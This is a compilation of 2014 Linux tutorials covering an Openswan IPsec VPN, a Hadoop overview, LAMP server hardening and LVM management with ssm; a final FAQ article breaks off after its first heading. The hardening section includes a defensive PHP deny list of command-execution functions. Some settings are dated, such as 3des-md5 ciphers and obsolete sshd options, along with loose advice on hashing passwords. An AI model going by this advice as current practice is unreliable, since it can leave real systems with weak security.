
How to create a site-to-site IPsec VPN tunnel using Openswan in Linux

http://xmodulo.com/2014/08/create-site-to-site-ipsec-vpn-tunnel-openswan-linux.html

A virtual private network (VPN) tunnel is used to securely interconnect two physically separate networks through a tunnel over the Internet. Tunneling is needed when the separate networks are private LAN subnets with globally non-routable private IP addresses, which cannot reach each other via ordinary routing over the Internet. For example, VPN tunnels are often deployed to connect different NATed branch office networks belonging to the same institution.
Sometimes VPN tunneling may be used simply for its security benefit as well. Service providers or private companies may design their networks in such a way that vital servers (e.g., database, VoIP, banking servers) are placed in a subnet that is accessible to trusted personnel through a VPN tunnel only. When a secure VPN tunnel is required, IPsec is often a preferred choice because an IPsec VPN tunnel is secured with multiple layers of security.
This tutorial will show how we can easily create a site-to-site VPN tunnel using Openswan in Linux.

Topology

This tutorial will focus on the following topologies for creating an IPsec tunnel.



Installing Packages and Preparing VPN Servers

Usually, you will be managing site-A only, but based on the requirements, you could be managing both site-A and site-B. We start the process by installing Openswan.
On Red Hat based Systems (CentOS, Fedora or RHEL):
# yum install openswan lsof
On Debian based Systems (Debian, Ubuntu or Linux Mint):
# apt-get install openswan
Now we disable VPN redirects, if any, in the server using these commands:
# for vpn in /proc/sys/net/ipv4/conf/*; do echo 0 > $vpn/accept_redirects; echo 0 > $vpn/send_redirects; done
Next, we modify the kernel parameters to allow IP forwarding and disable redirects permanently.
# vim /etc/sysctl.conf
net.ipv4.ip_forward = 1
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0
Reload /etc/sysctl.conf:
# sysctl -p
We allow necessary ports in the firewall. Please make sure that the rules are not conflicting with existing firewall rules.
# iptables -A INPUT -p udp --dport 500 -j ACCEPT
# iptables -A INPUT -p tcp --dport 4500 -j ACCEPT
# iptables -A INPUT -p udp --dport 4500 -j ACCEPT
Finally, we create firewall rules for NAT.
# iptables -t nat -A POSTROUTING -s site-A-private-subnet -d site-B-private-subnet -j SNAT --to site-A-Public-IP
Please make sure that the firewall rules are persistent.
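For example, on a Red Hat based system the running rule set can be saved with the iptables init script, while on Debian based systems the iptables-persistent package loads rules saved with iptables-save (file paths can vary by release):
## Red Hat based systems ##
# service iptables save
## Debian based systems, with the iptables-persistent package installed ##
# iptables-save > /etc/iptables/rules.v4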
Note:
  • You could use MASQUERADE instead of SNAT. Logically it should work, but it caused me to have issues with virtual private servers (VPS) in the past. So I would use SNAT if I were you.
  • If you are managing site-B as well, create similar rules in site-B server.
  • Direct routing does not need SNAT.

Preparing Configuration Files

The first configuration file that we will work with is ipsec.conf. Regardless of which server you are configuring, always consider your site as 'left' and remote site as 'right'. The following configuration is done in siteA's VPN server.
# vim /etc/ipsec.conf
## general configuration parameters ##
 
config setup
        plutodebug=all
        plutostderrlog=/var/log/pluto.log
        protostack=netkey
        nat_traversal=yes
        virtual_private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12
        ## disable opportunistic encryption in Red Hat ##
        oe=off
 
## disable opportunistic encryption in Debian ##
## Note: this is a separate declaration statement ##
include /etc/ipsec.d/examples/no_oe.conf
 
## connection definition in Red Hat ##
conn demo-connection-redhat
        authby=secret
        auto=start
        ike=3des-md5
        ## phase 1 ##
        keyexchange=ike
        ## phase 2 ##
        phase2=esp
        phase2alg=3des-md5
        compress=no
        pfs=yes
        type=tunnel
        left=
        leftsourceip=
        leftsubnet=/netmask
        ## for direct routing ##
        leftsubnet=/32
        leftnexthop=%defaultroute
        right=
        rightsubnet=/netmask
 
## connection definition in Debian ##
conn demo-connection-debian
        authby=secret
        auto=start
        ## phase 1 ##
        keyexchange=ike
        ## phase 2 ##
        esp=3des-md5
        pfs=yes
        type=tunnel
        left=
        leftsourceip=
        leftsubnet=/netmask
        ## for direct routing ##
        leftsubnet=/32
        leftnexthop=%defaultroute
        right=
        rightsubnet=/netmask
Authentication can be done in several different ways. This tutorial will cover the use of a pre-shared key, which is added to the file /etc/ipsec.secrets.
# vim /etc/ipsec.secrets
siteA-public-IP  siteB-public-IP:  PSK  "pre-shared-key"
## in case of multiple sites ##
siteA-public-IP  siteC-public-IP:  PSK  "corresponding-pre-shared-key"

Starting the Service and Troubleshooting

The server should now be ready to create a site-to-site VPN tunnel. If you are managing siteB as well, please make sure that you have configured the siteB server with the necessary parameters. For Red Hat based systems, make sure that you add the service to startup using the chkconfig command.
# /etc/init.d/ipsec restart
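For example, on a Red Hat based system the service can be enabled at boot like this:
# chkconfig ipsec on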
If there are no errors on either end server, the tunnel should now be up. Keeping the following in mind, you can test the tunnel with the ping command.
  1. The siteB private subnet should not be reachable from site A while the tunnel is down, i.e., ping should not work.
  2. After the tunnel is up, a ping from siteA to the siteB private subnet should succeed (see the example below).
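For example, from the siteA server or a host in its private subnet (the address below is just a placeholder for a host in siteB's private subnet):
# ping -c 4 [siteB-private-host-IP]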
Also, the routes to the destination's private subnet should appear in the server's routing table.
# ip route
[siteB-private-subnet] via [siteA-gateway] dev eth0 src [siteA-public-IP]
default via [siteA-gateway] dev eth0
Additionally, we can check the status of the tunnel using the following useful commands.
# service ipsec status
IPsec running  - pluto pid: 20754
pluto pid 20754
1 tunnels up
some eroutes exist
# ipsec auto --status
## output truncated ##
000 "demo-connection-debian": myip=; hisip=unset;
000 "demo-connection-debian": ike_life: 3600s; ipsec_life: 28800s; rekey_margin: 540s; rekey_fuzz: 100%; keyingtries: 0; nat_keepalive: yes
000 "demo-connection-debian": policy: PSK+ENCRYPT+TUNNEL+PFS+UP+IKEv2ALLOW+SAREFTRACK+lKOD+rKOD; prio: 32,28; interface: eth0;

## output truncated ##
000 #184: "demo-connection-debian":500 STATE_QUICK_R2 (IPsec SA established); EVENT_SA_REPLACE in 1653s; newest IPSEC; eroute owner; isakmp#183; idle; import:not set

## output truncated ##
000 #183: "demo-connection-debian":500 STATE_MAIN_I4 (ISAKMP SA established); EVENT_SA_REPLACE in 1093s; newest ISAKMP; lastdpd=-1s(seq in:0 out:0); idle; import:not set
The log file /var/log/pluto.log should also contain useful information regarding authentication, key exchanges and information on different phases of the tunnel. If your tunnel doesn't come up, you could check there as well.
If you are sure that all the configuration is correct, and if your tunnel is still not coming up, you should check the following things.
  1. Many ISPs filter IPsec ports. Make sure that UDP 500 and TCP/UDP 4500 are allowed by your ISP. You could try connecting to your server's IPsec ports from a remote location, e.g., with telnet.
  2. Make sure that necessary ports are allowed in the firewall of the server/s.
  3. Make sure that the pre-shared keys are identical in both end servers.
  4. The left and right parameters should be properly configured on both end servers.
  5. If you are facing problems with NAT, try using SNAT instead of MASQUERADE.
To sum up, this tutorial focused on the procedure of creating a site-to-site IPsec VPN tunnel in Linux using Openswan. VPN tunnels are very useful in enhancing security as they allow admins to make critical resources available only through the tunnels. VPN tunnels also ensure that the data in transit is secured from eavesdropping or interception.
Hope this helps. Let me know what you think.

An introduction to Apache Hadoop for big data

http://opensource.com/life/14/8/intro-apache-hadoop-big-data


Apache Hadoop is an open source software framework for storage and large scale processing of data-sets on clusters of commodity hardware. Hadoop is an Apache top-level project being built and used by a global community of contributors and users. It is licensed under the Apache License 2.0.
Doug Cutting with his son's stuffed elephant, Hadoop
Hadoop was created by Doug Cutting and Mike Cafarella in 2005. It was originally developed to support distribution for the Nutch search engine project. Doug, who was working at Yahoo! at the time and is now Chief Architect of Cloudera, named the project after his son's toy elephant. Cutting's son was 2 years old at the time and just beginning to talk. He called his beloved stuffed yellow elephant "Hadoop" (with the stress on the first syllable). Now 12, Doug's son often exclaims, "Why don't you say my name, and why don't I get royalties? I deserve to be famous for this!"

The Apache Hadoop framework is composed of the following modules

  1. Hadoop Common: contains libraries and utilities needed by other Hadoop modules
  2. Hadoop Distributed File System (HDFS): a distributed file-system that stores data on the commodity machines, providing very high aggregate bandwidth across the cluster
  3. Hadoop YARN: a resource-management platform responsible for managing compute resources in clusters and using them for scheduling of users' applications
  4. Hadoop MapReduce: a programming model for large scale data processing
All the modules in Hadoop are designed with a fundamental assumption that hardware failures (of individual machines, or racks of machines) are common and thus should be automatically handled in software by the framework. Apache Hadoop's MapReduce and HDFS components originally derived respectively from Google's MapReduce and Google File System (GFS) papers.
Beyond HDFS, YARN and MapReduce, the entire Apache Hadoop "platform" is now commonly considered to consist of a number of related projects as well: Apache Pig, Apache Hive, Apache HBase, and others.
An illustration of the Apache Hadoop ecosystem
For the end-users, though MapReduce Java code is common, any programming language can be used with "Hadoop Streaming" to implement the "map" and "reduce" parts of the user's program. Apache Pig and Apache Hive, among other related projects, expose higher level user interfaces like Pig latin and a SQL variant respectively. The Hadoop framework itself is mostly written in the Java programming language, with some native code in C and command line utilities written as shell-scripts.
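As a rough sketch of Hadoop Streaming, any pair of executables that read standard input and write standard output can serve as the mapper and reducer. The jar location and the script names below are placeholders and differ between installations:
$ hadoop jar /path/to/hadoop-streaming.jar \
    -input /user/demo/input \
    -output /user/demo/output \
    -mapper mapper.py \
    -reducer reducer.py \
    -file mapper.py -file reducer.py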

HDFS and MapReduce

There are two primary components at the core of Apache Hadoop 1.x: the Hadoop Distributed File System (HDFS) and the MapReduce parallel processing framework. These are both open source projects, inspired by technologies created inside Google.

Hadoop distributed file system

The Hadoop distributed file system (HDFS) is a distributed, scalable, and portable file system written in Java for the Hadoop framework. A Hadoop instance typically has a single namenode plus a cluster of datanodes that form the HDFS cluster (the arrangement is only "typical" because a datanode is not required on every node). Each datanode serves up blocks of data over the network using a block protocol specific to HDFS. The file system uses the TCP/IP layer for communication, and clients use remote procedure calls (RPC) to communicate with it.

HDFS stores large files (typically in the range of gigabytes to terabytes) across multiple machines. It achieves reliability by replicating the data across multiple hosts, and hence does not require RAID storage on hosts. With the default replication value, 3, data is stored on three nodes: two on the same rack, and one on a different rack. Data nodes can talk to each other to rebalance data, to move copies around, and to keep the replication of data high. HDFS is not fully POSIX-compliant, because the requirements for a POSIX file-system differ from the target goals for a Hadoop application. The tradeoff of not having a fully POSIX-compliant file-system is increased performance for data throughput and support for non-POSIX operations such as Append.
HDFS added high-availability capabilities in the 2.x releases, allowing the main metadata server (the NameNode) to be failed over to a standby, either manually or automatically, in the event of failure.
The HDFS file system includes a so-called secondary namenode, which misleads some people into thinking that when the primary namenode goes offline, the secondary namenode takes over. In fact, the secondary namenode regularly connects to the primary namenode and builds snapshots of the primary namenode's directory information, which the system then saves to local or remote directories. These checkpointed images can be used to restart a failed primary namenode without having to replay the entire journal of file-system actions and then edit the log to create an up-to-date directory structure. Because the namenode is the single point for storage and management of metadata, it can become a bottleneck when supporting a huge number of files, especially a large number of small files. HDFS Federation, a newer addition, aims to tackle this problem to a certain extent by allowing multiple namespaces served by separate namenodes.
An advantage of using HDFS is data awareness between the job tracker and task tracker. The job tracker schedules map or reduce jobs to task trackers with an awareness of the data location. For example, if node A contains data (x, y, z) and node B contains data (a, b, c), the job tracker schedules node B to perform map or reduce tasks on (a,b,c) and node A would be scheduled to perform map or reduce tasks on (x,y,z). This reduces the amount of traffic that goes over the network and prevents unnecessary data transfer. When Hadoop is used with other file systems, this advantage is not always available. This can have a significant impact on job-completion times, which has been demonstrated when running data-intensive jobs. HDFS was designed for mostly immutable files and may not be suitable for systems requiring concurrent write-operations.
Another limitation of HDFS is that it cannot be mounted directly by an existing operating system. Getting data into and out of the HDFS file system, an action that often needs to be performed before and after executing a job, can be inconvenient. A filesystem in Userspace (FUSE) virtual file system has been developed to address this problem, at least for Linux and some other Unix systems.
File access can be achieved through the native Java API; through the Thrift API, which can generate a client in the language of the user's choosing (C++, Java, Python, PHP, Ruby, Erlang, Perl, Haskell, C#, Cocoa, Smalltalk, or OCaml); through the command-line interface; or by browsing over HTTP with the HDFS-UI web app.
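For example, a few typical interactions through the command-line interface look like this (the paths are only illustrative):
$ hadoop fs -mkdir /user/demo
$ hadoop fs -put access.log /user/demo/
$ hadoop fs -ls /user/demo
$ hadoop fs -cat /user/demo/access.log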

JobTracker and TaskTracker: The MapReduce engine

Jobs and tasks in Hadoop
Above the file systems comes the MapReduce engine, which consists of one JobTracker, to which client applications submit MapReduce jobs. The JobTracker pushes work out to available TaskTracker nodes in the cluster, striving to keep the work as close to the data as possible.
With a rack-aware file system, the JobTracker knows which node contains the data, and which other machines are nearby. If the work cannot be hosted on the actual node where the data resides, priority is given to nodes in the same rack. This reduces network traffic on the main backbone network.
If a TaskTracker fails or times out, that part of the job is rescheduled. The TaskTracker on each node spawns off a separate Java Virtual Machine process to prevent the TaskTracker itself from failing if the running job crashes the JVM. A heartbeat is sent from the TaskTracker to the JobTracker every few minutes to check its status. The Job Tracker and TaskTracker status and information is exposed by Jetty and can be viewed from a web browser.
 Hadoop 1.x MapReduce System is composed of the JobTracker, which is the master, and the per-node slaves, TaskTrackers
If the JobTracker failed on Hadoop 0.20 or earlier, all ongoing work was lost. Hadoop version 0.21 added some checkpointing to this process. The JobTracker records what it is up to in the file system. When a JobTracker starts up, it looks for any such data, so that it can restart work from where it left off.

Known limitations of this approach in Hadoop 1.x

The allocation of work to TaskTrackers is very simple. Every TaskTracker has a number of available slots (such as "4 slots"). Every active map or reduce task takes up one slot. The Job Tracker allocates work to the tracker nearest to the data with an available slot. There is no consideration of the current system load of the allocated machine, and hence its actual availability. If one TaskTracker is very slow, it can delay the entire MapReduce job—especially towards the end of a job, where everything can end up waiting for the slowest task. With speculative execution enabled, however, a single task can be executed on multiple slave nodes.

Apache Hadoop NextGen MapReduce (YARN)

MapReduce has undergone a complete overhaul in hadoop-0.23 and we now have, what we call, MapReduce 2.0 (MRv2) or YARN.
Apache™ Hadoop® YARN is a sub-project of Hadoop at the Apache Software Foundation introduced in Hadoop 2.0 that separates the resource management and processing components. YARN was born of a need to enable a broader array of interaction patterns for data stored in HDFS beyond MapReduce. The YARN-based architecture of Hadoop 2.0 provides a more general processing platform that is not constrained to MapReduce.
Architectural view of YARN
The fundamental idea of MRv2 is to split up the two major functionalities of the JobTracker, resource management and job scheduling/monitoring, into separate daemons. The idea is to have a global ResourceManager (RM) and per-application ApplicationMaster (AM). An application is either a single job in the classical sense of Map-Reduce jobs or a DAG of jobs.
The ResourceManager and per-node slave, the NodeManager (NM), form the data-computation framework. The ResourceManager is the ultimate authority that arbitrates resources among all the applications in the system.
The per-application ApplicationMaster is, in effect, a framework specific library and is tasked with negotiating resources from the ResourceManager and working with the NodeManager(s) to execute and monitor the tasks.
Overview of Hadoop 1.0 and Hadoop 2.0
A next-generation framework for Hadoop data processing
As part of Hadoop 2.0, YARN takes the resource management capabilities that were in MapReduce and packages them so they can be used by new engines. This also streamlines MapReduce to do what it does best: process data. With YARN, you can now run multiple applications in Hadoop, all sharing common resource management. Many organizations are already building applications on YARN in order to bring them into Hadoop. When enterprise data is made available in HDFS, it is important to have multiple ways to process that data. With Hadoop 2.0 and YARN, organizations can use Hadoop for streaming, interactive, and a world of other Hadoop-based applications.

What YARN does

YARN enhances the power of a Hadoop compute cluster in the following ways:
  • Scalability: The processing power in data centers continues to grow quickly. Because YARN ResourceManager focuses exclusively on scheduling, it can manage those larger clusters much more easily.
  • Compatibility with MapReduce: Existing MapReduce applications and users can run on top of YARN without disruption to their existing processes.
  • Improved cluster utilization: The ResourceManager is a pure scheduler that optimizes cluster utilization according to criteria such as capacity guarantees, fairness, and SLAs. Also, unlike before, there are no named map and reduce slots, which helps to better utilize cluster resources.
  • Support for workloads other than MapReduce: Additional programming models such as graph processing and iterative modeling are now possible for data processing. These added models allow enterprises to realize near real-time processing and increased ROI on their Hadoop investments.
  • Agility: With MapReduce becoming a user-land library, it can evolve independently of the underlying resource manager layer and in a much more agile manner.

How YARN works

The fundamental idea of YARN is to split up the two major responsibilities of the JobTracker/TaskTracker into separate entities:
  • a global ResourceManager
  • a per-application ApplicationMaster
  • a per-node slave NodeManager and
  • a per-application container running on a NodeManager
The ResourceManager and the NodeManager form the new, and generic, system for managing applications in a distributed manner. The ResourceManager is the ultimate authority that arbitrates resources among all the applications in the system. The per-application ApplicationMaster is a framework-specific entity and is tasked with negotiating resources from the ResourceManager and working with the NodeManager(s) to execute and monitor the component tasks. The ResourceManager has a scheduler, which is responsible for allocating resources to the various running applications, according to constraints such as queue capacities, user-limits etc. The scheduler performs its scheduling function based on the resource requirements of the applications. The NodeManager is the per-machine slave, which is responsible for launching the applications' containers, monitoring their resource usage (cpu, memory, disk, network) and reporting the same to the ResourceManager. Each ApplicationMaster has the responsibility of negotiating appropriate resource containers from the scheduler, tracking their status, and monitoring their progress. From the system perspective, the ApplicationMaster runs as a normal container.

How to secure a LAMP server on CentOS or RHEL

http://xmodulo.com/2014/08/secure-lamp-server-centos-rhel.html

LAMP is a software stack composed of Linux (an operating system as a base layer), Apache (a web server that "sits on top" of the OS), MySQL (or MariaDB, as a relational database management system), and finally PHP (a server-side scripting language that is used to process and display information stored in the database).
In this article we will assume that each component of the stack is already up and running, and will focus exclusively on securing the LAMP server(s). We must note, however, that server-side security is a vast subject, and therefore cannot be addressed adequately and completely in a single article.
In this post, we will cover the essential must-do's to secure each part of the stack.

Securing Linux

Since you may want to manage your CentOS server via ssh, you need to consider the following tips to secure remote access to the server by editing the /etc/ssh/sshd_config file.
1) Use key-based authentication, whenever possible, instead of basic authentication (username + password) to log on to your server remotely. We assume that you have already created a key pair with your user name on your client machine and copied it to your server (see the tutorial).
PasswordAuthentication no
RSAAuthentication yes
PubkeyAuthentication yes
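If the key pair has not been created and copied yet, a typical sequence on the client machine looks like this (the user and host names are placeholders):
$ ssh-keygen -t rsa
$ ssh-copy-id gacanepa@your-server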
2) Change the port sshd listens on. A good choice is a port number higher than 1024:
Port XXXX
3) Allow only protocol 2:
Protocol 2
4) Configure the authentication timeout, do not allow root logins, and restrict which users may log in via ssh:
LoginGraceTime 2m
PermitRootLogin no
AllowUsers gacanepa
5) Allow only specific hosts (and/or networks) to login via ssh:
In the /etc/hosts.deny file:
sshd: ALL
In the /etc/hosts.allow file:
sshd: XXX.YYY.ZZZ. AAA.BBB.CCC.DDD
where XXX.YYY.ZZZ. represents the first 3 octets of an IPv4 network address and AAA.BBB.CCC.DDD is an IPv4 address. With that setting, only hosts from network XXX.YYY.ZZZ.0/24 and host AAA.BBB.CCC.DDD will be allowed to connect via ssh. All other hosts will be disconnected before they even get to the login prompt, and will receive an error like this:

(Do not forget to restart the sshd daemon to apply these changes: service sshd restart).
We must note that this approach is a quick and easy (but somewhat rudimentary) way of blocking incoming connections to your server. For further customization, scalability and flexibility, you should consider using plain iptables and/or fail2ban.

Securing Apache

1) Make sure that the system user that is running Apache web server does not have access to a shell:
# grep -i apache /etc/passwd
If user apache has a default shell (such as /bin/sh), we must change it to /bin/false or /sbin/nologin:
# usermod -s /sbin/nologin apache

The following suggestions (2 through 5) refer to the /etc/httpd/conf/httpd.conf file:
2) Disable directory listing: this will prevent the browser from displaying the contents of a directory if there is no index.html present in that directory.
Delete the word Indexes in the Options directive:
# The Options directive is both complicated and important.  Please see
# http://httpd.apache.org/docs/2.2/mod/core.html#options
# for more information.
#
Options Indexes FollowSymLinks
Should read:
Options None

In addition, you need to make sure that the settings for directories and virtual hosts do not override this global configuration.
Following the example above, if we examine the settings for the /var/www/icons directory, we see that "Indexes MultiViews FollowSymLinks" should be changed to "None".

Before:
<Directory "/var/www/icons">
    Options Indexes MultiViews FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>

After:
<Directory "/var/www/icons">
    Options None
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>
3) Hide Apache version, as well as module/OS information in error (e.g. Not Found and Forbidden) pages.
ServerTokens Prod # This means that the http response header will return just "Apache" but not its version number
ServerSignature Off # The OS information is hidden

4) Disable unneeded modules by commenting out the lines where those modules are declared:

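For example, modules are disabled by commenting out their LoadModule lines in httpd.conf (the two modules below are only an illustration; review which modules your sites actually need before disabling anything):
#LoadModule autoindex_module modules/mod_autoindex.so
#LoadModule status_module modules/mod_status.so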
TIP: Disabling autoindex_module is another way to hide directory listings when there is not an index.html file in them.
5) Limit HTTP request size (body and headers) and set connection timeout. The directives below are listed with the context where each may appear, an example, and its meaning.

Directive: LimitRequestBody
Context: server config, virtual host, directory, .htaccess
Example: limit file uploads to 100 KiB max. for the uploads directory:
<Directory "/var/www/test/uploads">
   LimitRequestBody 102400
</Directory>
This directive specifies the number of bytes, from 0 (meaning unlimited) to 2147483647 (2 GB), that are allowed in a request body.

Directive: LimitRequestFieldSize
Context: server config, virtual host
Example: change the allowed HTTP request header size to 4 KiB (the default is 8 KiB), server wide:
LimitRequestFieldSize 4094
This directive specifies the number of bytes that will be allowed in an HTTP request header and gives the server administrator greater control over abnormal client request behavior, which may be useful for avoiding some forms of denial-of-service attacks.

Directive: TimeOut
Context: server config, virtual host
Example: change the timeout from 300 (the default if no value is set) to 120:
TimeOut 120
This is the amount of time, in seconds, the server will wait for certain events before failing a request.
For more directives and instructions on how to set them up, refer to the Apache docs.

Securing MySQL Server

We will begin by running the mysql_secure_installation script, which comes with the mysql-server package.
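The script is run as root and then walks interactively through the steps listed below:
# mysql_secure_installation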
1) If we have not set a root password for the MySQL server during installation, now is the time to do so. Remember: this is essential in a production environment.

The process will continue:

2) Remove the anonymous user:

3) Only allow root to connect from localhost:

4) Remove the default database named test:

5) Apply changes:

6) Next, we will edit some variables in the /etc/my.cnf file:
[mysqld]
bind-address=127.0.0.1 # MySQL will only accept connections from localhost
local-infile=0 # Disable direct filesystem access
log=/var/log/mysqld.log # Enable log file to watch out for malicious activities
Don't forget to restart MySQL server with 'service mysqld restart'.
Now, when it comes to day-to-day database administration, you'll find the following suggestions useful:
  • If for some reason we need to manage our database remotely, we can do so by connecting via ssh to our server first to perform the necessary querying and administration tasks locally.
  • We may want to enable direct access to the filesystem later if, for example, we need to perform a bulk import of a file into the database.
  • Keeping logs is not as critical as the two things mentioned earlier, but may come in handy to troubleshoot our database and/or be aware of unfamiliar activities.
  • DO NOT, EVER, store sensitive information (such as passwords, credit card numbers, bank PINs, to name a few examples) in plain text format. Consider using hash functions to obfuscate this information.
  • Make sure that application-specific databases can be accessed only by the corresponding user that was created by the application for that purpose.
To adjust the access permissions of MySQL users, use these instructions.
First, retrieve the list of users from the user table:
gacanepa@centos:~$ mysql -u root -p
Enter password: [Your root password here]
mysql> SELECT User,Host FROM mysql.user;

Make sure that each user only has access (and the minimum permissions) to the databases it needs. In the following example, we will check the permissions of user db_usuario:
mysql> SHOW GRANTS FOR 'db_usuario'@'localhost';

You can then revoke permissions and access as needed.
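As a rough sketch, granting a user only the privileges it needs on its own database, and revoking one it should not have, could look like this (the database name app_db and the privilege list are hypothetical; db_usuario is the user from the example above):
mysql> GRANT SELECT, INSERT, UPDATE, DELETE ON app_db.* TO 'db_usuario'@'localhost';
mysql> REVOKE DELETE ON app_db.* FROM 'db_usuario'@'localhost';
mysql> FLUSH PRIVILEGES;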

Securing PHP

Since this article is focused on securing the components of the LAMP stack, we will not go into detail about the programming side of things. We will assume that our web applications are secure in the sense that the developers have gone out of their way to make sure that there are no vulnerabilities that can give rise to common attacks such as XSS or SQL injection.
1) Disable unnecessary modules:
We can display the list of currently compiled-in modules with the following command: php -m

And disable those that are not needed by either removing or renaming the corresponding file in the /etc/php.d directory.
For example, since the mysql extension has been deprecated as of PHP v5.5.0 (and will be removed in the future), we may want to disable it:
# php -m | grep mysql
# mv /etc/php.d/mysql.ini /etc/php.d/mysql.ini.disabled

2) Hide PHP version information:
# echo "expose_php=off">> /etc/php.d/security.ini [or modify the security.ini file if it already exists]

3) Set open_basedir to a few specific directories (in php.ini) in order to restrict access to the underlying file system:
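For example, the following line in php.ini restricts PHP to a handful of directories (these paths are only an illustration; adjust them to your own document root and temporary directories):
open_basedir = "/var/www/html:/var/lib/php/session:/tmp"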

4) Disable remote code/command execution along with easy exploitable functions such as exec(), system(), passthru(), eval(), and so on (in php.ini):
allow_url_fopen = Off
allow_url_include = Off
disable_functions = "exec, system, passthru, eval"


Summing Up

1) Keep packages updated to their most recent version (compare the output of the following commands with the output of 'yum info [package]'):
The following commands return the current versions of Apache, MySQL and PHP:
# httpd -v
# mysql -V (capital V)
# php -v

Then 'yum update [package]' can be used to update the package in order to have the latest security patches.
2) Make sure that configuration files can only be written by the root account:
# ls -l /etc/httpd/conf/httpd.conf
# ls -l /etc/my.cnf
# ls -l /etc/php.ini /etc/php.d/security.ini

3) Finally, if you have the chance, run these services (web server, database server, and application server) in separate physical or virtual machines (and protect communications between them via a firewall), so that in case one of them becomes compromised, the attacker will not have immediate access to the others. If that is the case, you may have to tweak some of the configurations discussed in this article. Note that this is just one of the setups that could be used to increase security in your LAMP server.

How to manage LVM volumes on CentOS / RHEL 7 with System Storage Manager

http://xmodulo.com/2014/09/manage-lvm-volumes-centos-rhel-7-system-storage-manager.html

Logical Volume Manager (LVM) is an extremely flexible disk management scheme, allowing you to create and resize logical disk volumes off of multiple physical hard drives with no downtime. However, its powerful features come at the price of a somewhat steep learning curve, with more involved steps to set up LVM using multiple command line tools, compared to managing traditional disk partitions.
Here is good news for CentOS/RHEL users. The latest CentOS/RHEL 7 now comes with System Storage Manager (aka ssm) which is a unified command line interface developed by Red Hat for managing all kinds of storage devices. Currently there are three kinds of volume management backends available for ssm: LVM, Btrfs, and Crypt.
In this tutorial, I will demonstrate how to manage LVM volumes with ssm. You will be blown away by how simple it is to create and manage LVM volumes now. :-)

Preparing SSM

On fresh CentOS/RHEL 7, you need to install System Storage Manager first.
$ sudo yum install system-storage-manager
First, let's check information about available hard drives and LVM volumes. The following command will show information about existing disk storage devices, storage pools, LVM volumes and storage snapshots. The output is from a fresh CentOS 7 installation, which uses LVM and the XFS file system by default.
$ sudo ssm list

In this example, there are two physical devices ("/dev/sda" and "/dev/sdb"), one storage pool ("centos"), and two LVM volumes ("/dev/centos/root" and "/dev/centos/swap") created in the pool.

Add a Physical Disk to an LVM Pool

Let's add a new physical disk (e.g., /dev/sdb) to an existing storage pool (e.g., centos). The command to add a new physical storage device to an existing pool is as follows.
$ sudo ssm add -p centos /dev/sdb

After a new device is added to a pool, the pool will automatically be enlarged by the size of the device. Check the size of the storage pool named centos as follows.

As you can see, the centos pool has been successfully expanded from 7.5GB to 8.5GB. At this point, however, disk volumes (e.g., /dev/centos/root and /dev/centos/swap) that exist in the pool are not utilizing the added space. For that, we need to expand existing LVM volumes.

Expand an LVM Volume

If you have extra space in a storage pool, you can enlarge existing disk volumes in the pool. For that, use the resize option of the ssm command.
$ sudo ssm resize -s [size] [volume]
Let's increase the size of /dev/centos/root volume by 500MB.
$ sudo ssm resize -s+500M /dev/centos/root

Verify the updated size of existing volumes.
$ sudo ssm list volumes

We can confirm that the size of /dev/centos/root volume has increased from 6.7GB to 7.2GB. However, this does not mean that you can immediately utilize the extra space within the file system created inside the volume. You can see that the file system size ("FS size") still remains as 6.7GB.
To make the file system recognize the increased volume size, you need to "expand" an existing file system itself. Depending on which file system you are using, there are different tools to expand an existing filesystem. For example, use resize2fs for EXT2/EXT3/EXT4, xfs_growfs for XFS, btrfs for Btrfs, etc.
In this example, we are using CentOS 7, where XFS file system is created by default. Thus, we use xfs_growfs to expand an existing XFS file system.
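For example, assuming /dev/centos/root is mounted at / as in the default CentOS 7 layout, the file system can be grown to fill the volume like this:
$ sudo xfs_growfs /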
After expanding the XFS file system, verify that the file system now occupies the entire 7.2GB disk volume.


Create a New LVM Pool/Volume

In this experiment, let's see how we can create a new storage pool and a new LVM volume on top of a physical disk drive. With traditional LVM tools, the entire procedure is quite involved: preparing partitions, creating physical volumes, volume groups, and logical volumes, and finally building a file system. With ssm, however, the entire procedure can be completed in one shot!
What the following command does is to create a storage pool named mypool, create a 500MB LVM volume named disk0 in the pool, format the volume with XFS file system, and mount it under /mnt/test. You can immediately see the power of ssm.
$ sudo ssm create -s 500M -n disk0 --fstype xfs -p mypool /dev/sdc /mnt/test

Let's verify the created disk volume.


Take a Snapshot of an LVM Volume

Using the ssm tool, you can also take a snapshot of existing disk volumes. Note that snapshots work only if the backend that the volumes belong to supports snapshotting. The LVM backend supports online snapshotting, which means we do not have to take the volume being snapshotted offline. Also, since the LVM backend of ssm supports LVM2, the snapshots are read/write enabled.
Let's take a snapshot of an existing LVM volume (e.g., /dev/mypool/disk0).
$ sudo ssm snapshot /dev/mypool/disk0
Once a snapshot is taken, it is stored as a special snapshot volume which stores all the data in the original volume at the time of snapshotting.

After a snapshot is stored, you can remove the original volume, and mount the snapshot volume to access the data in the snapshot.

Note that when you attempt to mount the snapshot volume while the original volume is mounted, you will get the following error message.
kernel: XFS (dm-3): Filesystem has duplicate UUID 27564026-faf7-46b2-9c2c-0eee80045b5b - can't mount

Remove an LVM Volume

Removing an existing disk volume or storage pool is as easy as creating one. If you attempt to remove a mounted volume, ssm will automatically unmount it first. No hassle there.
To remove an LVM volume:
$ sudo ssm remove <volume>
To remove a storage pool:
$ sudo ssm remove <pool>

Conclusion

Hopefully by now you see the power of ssm. In enterprise storage environments, it is quite common to deal with a wide array of storage devices, disk volumes and file systems. Instead of struggling with a number of different tools to manage a complex mix of storage configurations, you can master the single command-line tool ssm, and have its backends get the job done for you. ssm is definitely a must-have tool for any system administrators working in a complex storage management environment.

10 Answers To The Most Frequently Asked Linux Questions On Google

http://www.everydaylinuxuser.com/2014/09/10-answers-to-most-frequently-asked.html

Introduction

Go to Google and type in a query. As you type you will notice that Google suggests some questions and topics for you.

The suggestions that appear are based on the most searched-for topics for the keywords provided. There is a caveat: each person may receive a slightly different list based on what they have searched for in the past.

The concept of today's article is to provide answers to the most commonly asked questions using terms such as "Why is Linux", "What does Linux", "Can Linux" and "Which Linux".

I borrowed the concept of this article from the Going Linux podcast which did something similar in episode 253.


1. Why Is Linux Better Than Windows?

I have incorporated the first three items on the list into the answer for this question because on their own they are meaningless.

Why is Linux better than Windows?

